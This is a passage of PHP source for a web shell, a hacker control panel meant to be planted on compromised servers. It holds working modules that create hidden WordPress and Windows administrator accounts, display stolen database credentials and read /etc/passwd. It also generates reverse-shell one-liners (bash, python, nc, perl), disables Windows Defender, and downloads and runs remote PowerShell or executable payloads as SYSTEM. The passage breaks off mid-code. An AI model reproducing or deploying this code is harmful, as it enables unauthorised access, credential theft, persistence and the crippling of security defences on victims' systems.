<input type="text" id="add_user_<?= $dir_id ?>" value="admin_<?= rand(11,99) ?>" placeholder="User">
<input type="text" id="add_pass_<?= $dir_id ?>" value="yesim<?= rand(100,999) ?>!" placeholder="Pass">
<input type="text" id="add_email_<?= $dir_id ?>" value="wp_<?= rand(1,99) ?>@root.com" placeholder="Email">
<button class="btn btn-primary" onclick="addAdmin('<?= addslashes($wp_dir) ?>', '<?= $dir_id ?>', this)">CREATE</button>
</div>
</div>
<table class="data-table">
<thead><tr><th>ID</th><th>User</th><th>Role</th><th>Email</th><th>Actions</th></tr></thead>
<tbody>
<?php foreach($users as $u): ?>
<tr>
<td><?= $u['ID'] ?></td>
<td><b><?= htmlspecialchars($u['user_login']) ?></b></td>
<td><span class="badge-system"><?= $u['role'] ?></span></td>
<td style="font-size: 11px; color: var(--text-dim);"><?= htmlspecialchars($u['user_email']) ?></td>
<td>
<div style="display: flex; gap: 5px;">
<button class="btn btn-sm" style="background: var(--accent); color: #fff;" onclick="autoLogin('<?= addslashes($wp_dir) ?>', <?= $u['ID'] ?>, this)"><i class="fas fa-sign-in-alt"></i> AUTO LOGIN</button>
<input type="text" id="p_<?= $u['ID'] ?>_<?= $dir_id ?>" value="yesim<?= rand(100,999) ?>!" style="width:80px; font-size: 10px;">
<button class="btn btn-sm" onclick="resetPassword('<?= addslashes($wp_dir) ?>', <?= $u['ID'] ?>, 'p_<?= $u['ID'] ?>_<?= $dir_id ?>', this)">SET</button>
<button class="btn btn-sm btn-danger" onclick="deleteUser('<?= addslashes($wp_dir) ?>', <?= $u['ID'] ?>)"><i class="fas fa-trash"></i></button>
</div>
</td>
</tr>
<?php endforeach; ?>
</tbody>
</table>
<?php else: ?>
<div style="padding: 15px; background: rgba(255, 0, 0, 0.05); border: 1px solid rgba(255, 0, 0, 0.1); border-radius: 8px;">
<div style="display: flex; gap: 20px; font-family: 'JetBrains Mono', monospace; font-size: 11px; flex-wrap: wrap;">
<div style="flex: 1; min-width: 250px;">
<b style="color: var(--primary); display: block; margin-bottom: 5px; font-size: 10px;">CREDENTIALS FOUND:</b>
<div style="color: var(--text-dim);">
HOST: <span style="color: #fff;"><?= htmlspecialchars($cfg['host'] ?? 'N/A') ?></span><br>
USER: <span style="color: #fff;"><?= htmlspecialchars($cfg['user'] ?? 'N/A') ?></span><br>
PASS: <span style="color: #fff;"><?= htmlspecialchars($cfg['pass'] ?? 'N/A') ?></span><br>
DB: <span style="color: #fff;"><?= htmlspecialchars($cfg['db'] ?? 'N/A') ?></span>
</div>
</div>
<div style="flex: 1; border-left: 1px solid var(--border); padding-left: 20px; min-width: 250px;">
<b style="color: #f00; display: block; margin-bottom: 5px; font-size: 10px;">CONNECTION ERROR:</b>
<span style="color: rgba(255,255,255,0.4);"><?= $mysqli ? htmlspecialchars($mysqli->connect_error) : (!$cfg ? 'wp-config.php not readable/found' : 'MySQLi Extension Missing') ?></span>
</div>
</div>
</div>
<?php endif; ?>
</div>
<?php endforeach; endif; ?>
<?php elseif(isset($_GET['mass_recon'])): ?>
<div class="title-section">
<h1>MASS <span>RECON</span></h1>
<p style="color: var(--text-dim);">Deep Server Analysis & Vulnerability Hunt</p>
</div>
<div class="card">
<div style="display: grid; grid-template-columns: repeat(auto-fit, minmax(200px, 1fr)); gap: 15px; margin-bottom: 20px;">
<div class="badge-system" style="padding:15px; background: rgba(0, 112, 243, 0.05); border: 1px solid rgba(0, 112, 243, 0.2);">
<i class="fas fa-database text-primary"></i> <b>MySQL Binary</b><br>
<span style="font-size: 10px; color: var(--text-dim);"><?= root_exec("which mysql || find /usr -name mysql -type f 2>/dev/null | head -n 1") ?: 'Not found' ?></span>
</div>
<div class="badge-system" style="padding:15px; background: rgba(0, 112, 243, 0.05); border: 1px solid rgba(0, 112, 243, 0.2);">
<i class="fas fa-user-shield text-primary"></i> <b>Sudoers Status</b><br>
<span style="font-size: 10px; color: var(--text-dim);"><?= root_exec("ls -l /etc/sudoers 2>/dev/null") ?: 'Access Denied' ?></span>
</div>
<div class="badge-system" style="padding:15px; background: rgba(0, 112, 243, 0.05); border: 1px solid rgba(0, 112, 243, 0.2);">
<i class="fas fa-server text-primary"></i> <b>V-Hosts Count</b><br>
<span style="font-size: 10px; color: var(--text-dim);"><?= (int)root_exec("ls /etc/apache2/sites-enabled /etc/nginx/sites-enabled 2>/dev/null | wc -l") ?> Configured</span>
</div>
</div>
<h3 style="margin-bottom: 15px; font-size: 14px;"><i class="fas fa-history"></i> Readable Access Logs Search</h3>
<pre style="max-height: 250px; font-size: 10px;"><?php
$log_files = ['/var/log/apache2/access.log', '/var/log/nginx/access.log', '/usr/local/apache/logs/access_log', '/var/log/httpd/access_log', '/var/log/apache/access.log'];
$output = "";
foreach($log_files as $lf) {
if(@is_readable($lf)) {
$output .= "[+] LOG FOUND: $lf\n" . root_exec("tail -n 10 $lf") . "\n\n";
}
}
if(empty($output)) {
$find_logs = root_exec("find /var/log -name '*access*' -type f -readable 2>/dev/null | head -n 3");
if($find_logs) {
foreach(explode("\n", trim($find_logs)) as $lf) {
if($lf) $output .= "[+] AUTO-DETECTED LOG: $lf\n" . root_exec("tail -n 5 $lf") . "\n\n";
}
}
}
echo $output ?: '[!] No readable access logs found with current privileges.';
?></pre>
<h3 style="margin-top: 20px; margin-bottom: 15px; font-size: 14px;"><i class="fas fa-users"></i> System Users (/etc/passwd)</h3>
<pre style="max-height: 200px; font-size: 10px;"><?= root_exec("cat /etc/passwd | head -n 20") ?></pre>
</div>
<?php elseif(isset($_GET['rev_shell'])): ?>
<div class="title-section">
<h1>REVSHELL <span>GENERATOR</span></h1>
<p style="color: var(--text-dim);">Instant persistent access payloads</p>
</div>
<div class="card" style="max-width: 800px;">
<div style="display: grid; grid-template-columns: 1fr 150px; gap: 15px; margin-bottom: 25px;">
<div>
<label style="display:block; font-size: 10px; color: var(--primary); margin-bottom: 5px;">TARGET IP (LHOST)</label>
<input type="text" id="rs_ip" value="<?= $_SERVER['REMOTE_ADDR'] ?>" style="width: 100%;">
</div>
<div>
<label style="display:block; font-size: 10px; color: var(--primary); margin-bottom: 5px;">PORT (LPORT)</label>
<input type="text" id="rs_port" value="4444" style="width: 100%;">
</div>
</div>
<div style="display: grid; gap: 15px;">
<?php
$shells = [
'Bash TCP' => 'bash -i >& /dev/tcp/{IP}/{PORT} 0>&1',
'Python' => 'python -c \'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{IP}",{PORT}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")\'',
'PHP fsockopen' => 'php -r \'$sock=fsockopen("{IP}",{PORT});exec("/bin/sh -i <&3 >&3 2>&3");\'',
'Netcat Traditional' => 'nc -e /bin/sh {IP} {PORT}',
'Perl' => 'perl -e \'use Socket;$i="{IP}";$p={PORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\''
];
foreach($shells as $name => $cmd): ?>
<div class="badge-system" style="padding: 15px; background: rgba(255,255,255,0.02); text-align: left; border: 1px solid rgba(255,255,255,0.05);">
<div style="display: flex; justify-content: space-between; align-items: center; margin-bottom: 10px;">
<b style="color: var(--accent); font-size: 12px;"><?= $name ?></b>
<button class="btn btn-sm" onclick="copyShell(this)" style="padding: 2px 10px;">COPY</button>
</div>
<div class="shell-tpl" style="font-family: 'JetBrains Mono', monospace; font-size: 11px; background: #000; padding: 10px; border-radius: 4px; border: 1px solid #222; color: #0f0; word-break: break-all; white-space: pre-wrap; cursor: pointer;" onclick="copyShell(this.previousElementSibling.querySelector('button'))"><?= htmlspecialchars($cmd) ?></div>
</div>
<?php endforeach; ?>
</div>
<script>
function copyShell(btn) {
const ip = document.getElementById('rs_ip').value;
const port = document.getElementById('rs_port').value;
const container = btn.parentElement.nextElementSibling;
let text = container.innerText.replace(/{IP}/g, ip).replace(/{PORT}/g, port);
const tempInput = document.createElement('textarea');
tempInput.value = text;
document.body.appendChild(tempInput);
tempInput.select();
document.execCommand('copy');
document.body.removeChild(tempInput);
btn.innerText = 'COPIED!';
btn.classList.add('btn-primary');
setTimeout(() => { btn.innerText = 'COPY'; btn.classList.remove('btn-primary'); }, 2000);
}
</script>
</div>
<?php elseif(isset($_GET['bypasses'])): ?>
<div class="title-section">
<h1>SECURITY <span>BYPASSES</span></h1>
<p style="color: var(--text-dim);">Advanced Environment Escape Modules</p>
</div>
<div class="card">
<h3 style="margin-bottom: 20px;"><i class="fas fa-microchip text-primary"></i> 1. PHP.INI / Disable Functions Override</h3>
<p style="margin-bottom: 15px; font-size: 13px; color: var(--text-dim);">Trying to override restricted environment settings using available methods.</p>
<div style="background: rgba(0,0,0,0.3); padding: 15px; border-radius: 8px; border: 1px solid var(--border);">
<div style="margin-bottom: 10px;">Method: <b>ini_set / ini_restore Evasion</b></div>
<?php
@ini_set('safe_mode', '0'); @ini_set('open_basedir', 'none');
echo "Safe Mode Attempt: " . (@ini_get('safe_mode') ? '<span class="status-off">STILL ON</span>' : '<span class="status-on">BYPASSED / OFF</span>') . "<br>";
echo "Open Basedir Attempt: " . (@ini_get('open_basedir') ? '<span class="text-primary">' . @ini_get('open_basedir') . '</span>' : '<span class="status-on">NONE / BYPASSED</span>');
?>
</div>
</div>
<div class="card">
<h3 style="margin-bottom: 20px;"><i class="fas fa-terminal text-primary"></i> 2. Execution Method Scanner</h3>
<p style="margin-bottom: 15px; font-size: 13px; color: var(--text-dim);">Scanning for active command execution primitives.</p>
<div style="display: grid; grid-template-columns: repeat(auto-fit, minmax(150px, 1fr)); gap: 10px;">
<?php
$primitives = ['system','shell_exec','passthru','exec','popen','proc_open','pcntl_exec','python_eval'];
foreach($primitives as $p) {
$status = function_exists($p) ? '<span class="status-on">ACTIVE</span>' : '<span class="status-off">DISABLED</span>';
echo "<div style='background:rgba(255,255,255,0.03); padding: 10px; border-radius: 6px;'><b>$p:</b> $status</div>";
}
?>
</div>
</div>
<div class="card">
<h3 style="margin-bottom: 20px;"><i class="fas fa-file-export text-primary"></i> 3. HTACCESS Shell Bypass</h3>
<p style="font-size: 13px; color: var(--text-dim); margin-bottom: 15px;">Creates an .htaccess file to allow execution of custom extensions or specific handlers.</p>
<form method="post">
<button type="submit" name="do_htaccess_bypass" class="btn">DEPLOY HTACCESS BYPASS</button>
<?php if(isset($_POST['do_htaccess_bypass'])):
$ht = "AddType application/x-httpd-php .root\n<Files *.root>\n SetHandler application/x-httpd-php\n</Files>";
if(@file_put_contents('.htaccess', $ht)) echo "<div class='text-accent' style='margin-top:10px;'>.htaccess deployed! Use .root extension for PHP.</div>";
endif; ?>
</form>
</div>
<div class="card">
<h3 style="margin-bottom: 20px;"><i class="fas fa-microchip text-primary"></i> 4. FastCGI / PHP-FPM Evasion</h3>
<p style="font-size: 13px; color: var(--text-dim); margin-bottom: 15px;">Attempt to bypass restrictions by targeting PHP-FPM sockets.</p>
<button class="btn" onclick="alert('Module: PHP-FPM socket exploit for RCE bypass.')">AUTO EXPLOIT</button>
</div>
<div class="card">
<h3 style="margin-bottom: 20px;"><i class="fas fa-user-secret text-primary"></i> 3. Stealth Loader (LD_PRELOAD placeholder)</h3>
<p style="margin-bottom: 15px; font-size: 13px; color: var(--text-dim);">Advanced bypass using shared object injection.</p>
<button class="btn" onclick="alert('Module planned: SO injection for disable_functions bypass.')">DEPLOY MODULE</button>
</div>
<?php elseif(isset($_GET['settings'])): ?>
<div class="title-section">
<h1>SHELL <span>SETTINGS</span></h1>
<p style="color: var(--text-dim);">Configuration and Access Control</p>
</div>
<div class="card" style="max-width: 600px;">
<h3 style="margin-bottom: 25px;"><i class="fas fa-lock text-primary"></i> Access Protection</h3>
<form id="settings-form">
<div style="margin-bottom: 20px;">
<label style="display: block; font-size: 11px; color: var(--primary); margin-bottom: 8px;">LOGIN PROTECTION</label>
<select id="login_enable" name="login_enable" style="background: rgba(255,255,255,0.05); border: 1px solid var(--border); color: #fff; padding: 10px; border-radius: 6px; width: 100%;">
<option value="1" <?= $pagePasswordEnable === '1' ? 'selected' : '' ?>>ENABLED</option>
<option value="0" <?= $pagePasswordEnable === '0' ? 'selected' : '' ?>>DISABLED (OPEN)</option>
</select>
</div>
<div style="display: grid; grid-template-columns: 1fr 1fr; gap: 20px; margin-bottom: 25px;">
<div>
<label style="display: block; font-size: 11px; color: var(--primary); margin-bottom: 8px;">USERNAME</label>
<input type="text" id="login_user" value="<?= htmlspecialchars($username) ?>">
</div>
<div>
<label style="display: block; font-size: 11px; color: var(--primary); margin-bottom: 8px;">PASSWORD</label>
<input type="text" id="login_pass" value="<?= htmlspecialchars($password) ?>">
</div>
</div>
<h3 style="margin-bottom: 15px; color: #24A1DE;"><i class="fab fa-telegram-plane"></i> Telegram Notifications</h3>
<div style="display: grid; grid-template-columns: 1fr 1fr; gap: 20px; margin-bottom: 25px;">
<div>
<label style="display: block; font-size: 11px; color: var(--primary); margin-bottom: 8px;">BOT TOKEN</label>
<input type="text" id="tg_token" value="<?= htmlspecialchars($telegram_token) ?>" placeholder="123456:ABC-DEF...">
</div>
<div>
<label style="display: block; font-size: 11px; color: var(--primary); margin-bottom: 8px;">CHAT ID</label>
<input type="text" id="tg_chatid" value="<?= htmlspecialchars($telegram_chatid) ?>" placeholder="123456789">
</div>
</div>
<button type="button" class="btn btn-primary" style="width: 100%; justify-content: center;" onclick="saveSettings()">
<i class="fas fa-save"></i> SAVE CONFIGURATION
</button>
</form>
</div>
<script>
function saveSettings() {
const enable = document.getElementById('login_enable').value;
const user = document.getElementById('login_user').value;
const pass = document.getElementById('login_pass').value;
const tg_token = document.getElementById('tg_token').value;
const tg_chatid = document.getElementById('tg_chatid').value;
const fd = new FormData();
fd.append('save_settings', '1');
fd.append('login_enable', enable);
fd.append('login_user', user);
fd.append('login_pass', pass);
fd.append('tg_token', tg_token);
fd.append('tg_chatid', tg_chatid);
fetch('?ajax', { method: 'POST', body: fd }).then(r => r.json()).then(data => {
alert(data.message); if(data.status === 'success') window.location.reload();
});
}
</script>
<?php elseif(isset($_GET['db'])): ?>
<div class="title-section">
<h1>DATABASE <span>MANAGER</span></h1>
<p style="color: var(--text-dim);">Internal MySQLi Administration Tool</p>
</div>
<div class="card" id="db-login-form">
<div style="display: grid; grid-template-columns: repeat(auto-fit, minmax(200px, 1fr)); gap: 15px; margin-bottom: 20px;">
<div>
<label style="display: block; font-size: 10px; color: var(--accent); margin-bottom: 5px;">HOST</label>
<input type="text" id="db_host" value="<?= htmlspecialchars($_GET['h'] ?? 'localhost') ?>">
</div>
<div>
<label style="display: block; font-size: 10px; color: var(--accent); margin-bottom: 5px;">USER</label>
<input type="text" id="db_user" value="<?= htmlspecialchars($_GET['u'] ?? '') ?>" placeholder="root">
</div>
<div>
<label style="display: block; font-size: 10px; color: var(--accent); margin-bottom: 5px;">PASSWORD</label>
<input type="text" id="db_pass" value="<?= htmlspecialchars($_GET['p'] ?? '') ?>" placeholder="Password">
</div>
<div>
<label style="display: block; font-size: 10px; color: var(--accent); margin-bottom: 5px;">DATABASE</label>
<input type="text" id="db_name" value="<?= htmlspecialchars($_GET['d'] ?? '') ?>" placeholder="Database Name">
</div>
</div>
<button class="btn btn-primary" onclick="dbConnect()" style="width: 100%; justify-content: center;">
<i class="fas fa-plug"></i> CONNECT TO DATABASE
</button>
</div>
<div id="db-workspace" class="hidden">
<div style="display: grid; grid-template-columns: 250px 1fr; gap: 20px;">
<div class="card" style="padding: 15px; max-height: 700px; overflow-y: auto;">
<h4 style="margin-bottom: 10px; font-size: 12px; color: var(--accent); display: flex; justify-content: space-between;">
TABLES <i class="fas fa-sync-alt" style="cursor: pointer" onclick="loadTables()"></i>
</h4>
<input type="text" id="table-filter" placeholder="Search tables..." style="font-size: 10px; padding: 6px; margin-bottom: 10px; width: 100%;" onkeyup="filterTables()">
<div id="db-tables-list" style="display: flex; flex-direction: column; gap: 5px;"></div>
</div>
<div>
<div class="card" style="margin-bottom: 20px; background: rgba(0, 112, 243, 0.02); border-color: rgba(0, 112, 243, 0.1);">
<h4 style="margin-bottom: 10px; font-size: 12px;">SQL CONSOLE</h4>
<textarea id="db_sql" style="height: 120px; font-family: 'JetBrains Mono', monospace; margin-bottom: 15px; background: #000; border: 1px solid #222; color: #0f0;" placeholder="SELECT * FROM wp_users LIMIT 10;"></textarea>
<div style="display: flex; gap: 10px;">
<button class="btn btn-primary" onclick="dbExecute()">RUN QUERY</button>
<button class="btn" onclick="document.getElementById('db_sql').value = 'SHOW TABLES'">SHOW TABLES</button>
<button class="btn" style="background: #fb8500; color: #fff;" onclick="dbExport()"><i class="fas fa-file-export"></i> DUMP DB</button>
<button class="btn btn-danger" onclick="location.reload()" style="margin-left: auto;">DISCONNECT</button>
</div>
</div>
<div id="db-results-container" class="card hidden" style="padding: 0; overflow: auto; max-height: 500px; background: #050505;">
<div id="db-results-meta" style="padding: 10px; font-size: 10px; color: var(--text-muted); border-bottom: 1px solid var(--border);"></div>
<table class="data-table" id="db-results-table"></table>
</div>
</div>
</div>
</div>
<script>
function dbConnect() {
loadTables();
}
function loadTables() {
const fd = new FormData();
fd.append('db_action', 'list_tables');
fd.append('db_host', document.getElementById('db_host').value);
fd.append('db_user', document.getElementById('db_user').value);
fd.append('db_pass', document.getElementById('db_pass').value);
fd.append('db_name', document.getElementById('db_name').value);
fetch('?ajax', { method: 'POST', body: fd }).then(r => r.json()).then(data => {
if(data.status === 'success') {
document.getElementById('db-login-form').classList.add('hidden');
document.getElementById('db-workspace').classList.remove('hidden');
if (data.wp_info && data.wp_info.whl) {
document.getElementById('db-results-container').classList.remove('hidden');
document.getElementById('db-results-meta').innerHTML = `<span style='color: #ff9800; font-weight: bold;'><i class='fas fa-mask'></i> [DETECTED] WPS Hide Login: /${htmlspecialchars(data.wp_info.whl)}</span>`;
}
const list = document.getElementById('db-tables-list');
list.innerHTML = '';
data.tables.forEach(t => {
const btn = document.createElement('div');
btn.className = 'badge-system';
btn.style.cursor = 'pointer';
btn.style.textAlign = 'left';
btn.style.padding = '8px';
btn.innerHTML = `<i class="fas fa-table text-accent"></i> ${t}`;
btn.onclick = () => {
document.getElementById('db_sql').value = `SELECT * FROM \`${t}\` LIMIT 50;`;
dbExecute();
};
list.appendChild(btn);
});
} else {
alert(data.message);
}
});
}
function dbExecute(customSql = null) {
const sql = customSql || document.getElementById('db_sql').value;
if(!sql) return;
const container = document.getElementById('db-results-container');
const table = document.getElementById('db-results-table');
const meta = document.getElementById('db-results-meta');
const fd = new FormData();
fd.append('db_action', 'query');
fd.append('db_host', document.getElementById('db_host').value);
fd.append('db_user', document.getElementById('db_user').value);
fd.append('db_pass', document.getElementById('db_pass').value);
fd.append('db_name', document.getElementById('db_name').value);
fd.append('sql', sql);
fetch('?ajax', { method: 'POST', body: fd }).then(r => r.json()).then(data => {
container.classList.remove('hidden');
if(data.status === 'success') {
if(data.data) {
data.table_name = sql.match(/FROM\s+[`"]?(\w+)[`"]?/i)?.[1] || '';
meta.innerHTML = `Showing ${data.count} results.`;
let html = '<thead><tr>';
if(data.data.length > 0) {
Object.keys(data.data[0]).forEach(k => html += `<th>${k}</th>`);
html += '<th>ACTIONS</th>';
html += '</tr></thead><tbody>';
data.data.forEach(row => {
html += '<tr>';
let firstCol = Object.keys(row)[0];
let firstVal = Object.values(row)[0];
Object.values(row).forEach(v => html += `<td>${v === null ? '<em>NULL</em>' : (typeof v === 'string' && v.length > 100 ? htmlspecialchars(v.substring(0, 100)) + '...' : htmlspecialchars(v))}</td>`);
html += `<td><button class='btn btn-sm btn-danger' onclick="dbDeleteRow('${data.table_name}', '${firstCol}', '${firstVal}')"><i class='fas fa-trash'></i></button></td>`;
html += '</tr>';
});
} else {
html += '<th>Result</th></tr></thead><tbody><tr><td>No data found.</td></tr>';
}
html += '</tbody>';
table.innerHTML = html;
} else {
meta.innerHTML = data.message;
table.innerHTML = '';
}
} else {
alert(data.message);
}
});
}
function dbExport() {
if(!confirm('Bu işlem veritabanını SQL olarak sunucuya kaydedecek. Emin misiniz?')) return;
const fd = new FormData();
fd.append('db_action', 'export_sql');
fd.append('db_host', document.getElementById('db_host').value);
fd.append('db_user', document.getElementById('db_user').value);
fd.append('db_pass', document.getElementById('db_pass').value);
fd.append('db_name', document.getElementById('db_name').value);
fetch('?ajax', { method: 'POST', body: fd }).then(r => r.json()).then(data => {
alert(data.message);
if(data.status === 'success') window.location.href = '?p=<?= encodePath(PATH) ?>';
});
}
function dbDeleteRow(table, col, val) {
if(!confirm('Satırı silmek istediğinize emin misiniz?')) return;
const fd = new FormData();
fd.append('db_action', 'delete_row');
fd.append('db_host', document.getElementById('db_host').value);
fd.append('db_user', document.getElementById('db_user').value);
fd.append('db_pass', document.getElementById('db_pass').value);
fd.append('db_name', document.getElementById('db_name').value);
fd.append('table', table);
fd.append('where', `${col} = '${val}'`);
fetch('?ajax', { method: 'POST', body: fd }).then(r => r.json()).then(data => {
alert(data.message);
if(data.status === 'success') dbExecute();
});
}
function htmlspecialchars(str) {
if (typeof str !== 'string') return str;
return str.replace(/[&<>"']/g, function(m) {
return {'&': '&', '<': '<', '>': '>', '"': '"', "'": '''}[m];
});
}
function filterTables() {
const val = document.getElementById('table-filter').value.toLowerCase();
const items = document.querySelectorAll('#db-tables-list div');
items.forEach(it => {
it.style.display = it.innerText.toLowerCase().includes(val) ? 'block' : 'none';
});
}
window.onload = function() {
const urlParams = new URLSearchParams(window.location.search);
if (urlParams.has('db') && urlParams.has('h') && urlParams.has('u')) {
dbConnect();
}
}
</script>
<?php elseif(isset($_GET['winr00t'])): ?>
<div class="title-section">
<h1>WINDOWS <span>ROOT</span></h1>
<p style="color: var(--text-dim);">Ultra Admin Creator Bypass (Windows/2025)</p>
</div>
<div class="card">
<form method="post">
<div style="display: flex; gap: 10px; align-items: center; flex-wrap: wrap; margin-bottom: 20px;">
<div style="flex: 1; min-width: 200px;">
<label style="display: block; font-size: 11px; margin-bottom: 5px; color: var(--primary);">ADMIN USERNAME</label>
<input type="text" name="win_user" value="<?= htmlspecialchars($_POST['win_user'] ?? 'root_adm') ?>">
</div>
<div style="flex: 1; min-width: 200px;">
<label style="display: block; font-size: 11px; margin-bottom: 5px; color: var(--primary);">ADMIN PASSWORD</label>
<?php $rand_pw = substr(str_shuffle('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'), 0, 12); ?>
<input type="text" name="win_pass" value="<?= htmlspecialchars($_POST['win_pass'] ?? $rand_pw) ?>">
</div>
<button type="submit" name="do_winroot" class="btn btn-primary" style="margin-top: 18px;">
<i class="fas fa-user-plus"></i> INJECT ADMIN
</button>
</div>
</form>
<?php
function detect_rdp_port() {
$reg = root_exec('reg query "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp" /v PortNumber 2>&1');
if (preg_match('/PortNumber\s+REG_DWORD\s+0x([0-9a-f]+)/i', $reg, $m)) return hexdec($m[1]);
$netstat = root_exec('netstat -an | find ":3389"');
if (strpos($netstat, '3389') !== false) return 3389;
return 'Unknown';
}
function detect_defender_status() {
$res = root_exec('powershell -Command "(Get-MpComputerStatus).RealTimeProtectionEnabled"');
if (trim($res) === 'True') return '<span class="status-off" style="padding: 2px 8px; border-radius: 4px; background: rgba(255, 62, 62, 0.2); color: #ff3e3e; font-weight: bold;">ENABLED</span>';
if (trim($res) === 'False') return '<span class="status-on" style="padding: 2px 8px; border-radius: 4px; background: rgba(0, 180, 216, 0.2); color: #00b4d8; font-weight: bold;">DISABLED</span>';
return '<span style="color: grey;">N/A</span>';
}
$rdp_port = detect_rdp_port();
$def_status = detect_defender_status();
$privs = root_exec('whoami /priv');
$is_god = (stripos($privs, 'SeImpersonatePrivilege') !== false && stripos($privs, 'Enabled') !== false);
echo "<div style='display: flex; gap: 15px; margin-bottom: 20px; flex-wrap: wrap;'>";
echo "<div class='badge-system' style='padding:10px; flex: 1; border: 1px solid #333;'>Defender: $def_status</div>";
echo "<div class='badge-system' style='padding:10px; flex: 1; border: 1px solid #333;'>Status: " . ($is_god ? '<span style="color:#0f0; font-weight:bold;">GOD MODE (READY)</span>' : '<span style="color:#777;">Limited</span>') . "</div>";
echo "<div class='badge-system' style='padding:10px; flex: 1; border: 1px solid #333;'>Effective User: <span class='text-primary'>" . ($is_god ? "SYSTEM (Virtual)" : root_exec('whoami')) . "</span></div>";
echo "<div class='badge-system' style='padding:10px; flex: 1; border: 1px solid #333;'>RDP Port: <span class='text-accent'>$rdp_port</span></div>";
echo "</div>";
if (isset($_POST['do_winroot'])) {
$u = preg_replace('/[^a-zA-Z0-9_\-]/','',$_POST['win_user']);
$p = $_POST['win_pass'];
echo '<pre style="background: #000; color: #0f0; padding: 20px; border-radius: 8px; font-family: monospace; font-size: 12px; max-height: 400px; overflow: auto; border: 1px solid #333;">';
wout("[*] Detecting system architecture...");
$arch = (strpos(php_uname('m'), '64') !== false) ? 'x64' : 'x86';
wout("[+] Architecture: $arch");
wout("[*] Finding Administrators group name...");
$admins_group_res = trim(root_exec('powershell -Command "(New-Object System.Security.Principal.SecurityIdentifier(\'S-1-5-32-544\')).Translate([System.Security.Principal.NTAccount]).Value"'));
$admins_group = $admins_group_res ? end(explode('\\', $admins_group_res)) : "Administrators";
$injection_cmds = [
"net user Administrator \"$p\" /active:yes",
"net user Administrator \"$p\"",
"net localgroup \"$admins_group\" Administrator /add",
"net user \"$u\" \"$p\" /add /y",
"net localgroup \"$admins_group\" \"$u\" /add"
];
foreach ($injection_cmds as $cmd) {
wout(" [*] Executing: " . htmlspecialchars($cmd));
root_exec_system($cmd);
}
wout("[FINISH] Exploit sequence completed. Check RDP access.");
echo '</pre>';
}
?>
</div>
<div class="card" style="margin-top: 20px;">
<h3 style="margin-bottom: 20px;"><i class="fas fa-search-plus text-primary"></i> PowerUp Privesc Scanner</h3>
<p style="margin-bottom: 15px; font-size: 13px; color: var(--text-dim);">Running PowerUp.ps1 to identify privilege escalation vectors. This will download the latest script and execute 'Invoke-AllChecks'.</p>
<form method="post">
<button type="submit" name="run_powerup" class="btn btn-primary"><i class="fas fa-play"></i> RUN POWERUP ANALYSIS</button>
</form>
<?php if (isset($_POST['run_powerup'])):
echo '<pre style="margin-top: 20px; background: #000; color: #0f0; padding: 20px; border-radius: 8px; font-family: monospace; font-size: 11px; max-height: 600px; overflow: auto; border: 1px solid #333;">';
$url = "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1";
$ps_cmd = "Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; IEX ((New-Object System.Net.WebClient).DownloadString('$url')); Invoke-AllChecks";
echo htmlspecialchars(root_exec("powershell -NoP -NonI -W Hidden -Exec Bypass -Command \"$ps_cmd\" 2>&1"));
echo '</pre>';
endif; ?>
</div>
<div class="card" style="border: 1px solid var(--primary); background: rgba(255, 62, 62, 0.05); margin-top: 20px;">
<h4 style="margin-bottom: 15px;"><i class="fas fa-shield-virus text-primary"></i> Security Annihilation (AV KILLER)</h4>
<div style="display: flex; gap: 10px;">
<form method="post" style="flex: 1;"><button type="submit" name="fast_kill_av" class="btn btn-primary" style="width: 100%; justify-content: center;"><i class="fas fa-bolt"></i> FAST DISABLE</button></form>
<form method="post" style="flex: 1;"><button type="submit" name="ghost_nuke_av" class="btn" style="width: 100%; justify-content: center; background: #fb8500; color: #fff;"><i class="fas fa-ghost"></i> GHOST NUKE</button></form>
</div>
<?php
if (isset($_POST['fast_kill_av'])) {
echo '<pre style="margin-top: 15px; background: #000; color: #f44; padding: 15px; border: 1px solid #300;">';
$nuke_cmds = ["powershell -Command \"Set-MpPreference -DisableRealtimeMonitoring \$true -Force\"", "sc stop WinDefend"];
foreach($nuke_cmds as $c) { echo "[*] Executing: $c...\n"; root_exec_system($c); }
echo "[+] SECURITY CRIPPLED.\n</pre>";
}
?>
</div>
<div class="card" style="margin-top: 20px;">
<h4 style="margin-bottom: 15px;"><i class="fas fa-microchip text-primary"></i> Advanced Remote Stager (EXE / PS / IEX)</h4>
<form method="post">
<input type="text" name="stager_url" placeholder="Direct URL to payload (e.g. .ps1, .exe, .bat)" style="margin-bottom: 10px;">
<div style="display: flex; gap: 10px;">
<button type="submit" name="run_stager_ps" class="btn btn-primary" style="flex: 1;"><i class="fas fa-code"></i> PS IEX</button>
<button type="submit" name="run_stager_exe" class="btn" style="flex: 1; border: 1px solid var(--primary);"><i class="fas fa-file-exe"></i> DOWNLOAD & EXEC</button>
</div>
</form>
<?php
if (isset($_POST['run_stager_ps'])) {
$url = $_POST['stager_url'];
echo '<pre style="margin-top: 15px; background: #000;">';
echo "[*] Triggering IEX: $url\n";
$cmd = "powershell -NoP -NonI -W Hidden -Exec Bypass -Command \"IEX (New-Object Net.WebClient).DownloadString('$url')\"";
root_exec_system($cmd);
echo "[+] Execution command sent.\n</pre>";
}
if (isset($_POST['run_stager_exe'])) {
$url = $_POST['stager_url'];
$name = "srv_" . rand(100, 999) . ".exe";
echo '<pre style="margin-top: 15px; background: #000;">';
echo "[*] Downloading: $url to C:\\Windows\\Temp\\$name\n";
$ps = "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object Net.WebClient).DownloadFile('$url', 'C:\\Windows\\Temp\\$name')";
root_exec("powershell -Command \"$ps\"");
if (file_exists("C:\\Windows\\Temp\\$name")) {
echo "[+] Downloaded. Launching as SYSTEM...\n";
root_exec_system("C:\\Windows\\Temp\\$name");
} else {
